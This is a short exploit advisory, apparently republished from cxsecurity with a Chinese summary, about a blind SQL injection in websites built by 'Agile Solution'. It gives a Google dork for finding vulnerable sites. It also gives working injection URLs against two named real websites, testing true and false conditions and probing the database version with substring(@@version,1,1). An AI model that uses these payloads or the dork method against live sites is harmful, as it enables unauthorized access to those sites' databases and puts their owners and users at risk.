Agile Solutio - Blind Sql Injection Vulnerability
Agile Solution开发的网站存在Blind SQL注入漏洞。通过在URL参数末尾添加特定条件(如`'and true'`或`'and false'`),攻击者可利用此漏洞进行攻击。该漏洞已在多个网站上被验证。 2025-3-13 17:49:5 Author: cxsecurity.com(查看原文) 阅读量:16 收藏

********************************************************* #Exploit Title: Agile Solutio - Blind Sql Injection Vulnerability #Date: 2025-03-12 #Exploit Author: Behrouz Mansoori #Google Dork: "Design and Developed by Agile Solution" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://kickyindustries.com/products_list.php?id=24%27%20and%20true--+ * https://kickyindustries.com/products_list.php?id=24%27%20and%20false--+ * https://kickyindustries.com/products_list.php?id=24%27%20and%20substring(@@version,1,1)=1--+ ### Demo 2: * https://uniqueworld.com.pk/product.php?id=93%27%20and%20true--+ * https://uniqueworld.com.pk/product.php?id=93%27%20and%20false--+ * https://uniqueworld.com.pk/product.php?id=93%27%20and%20substring(@@version,1,1)=1--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025030016
如有侵权请联系:admin#unsafe.sh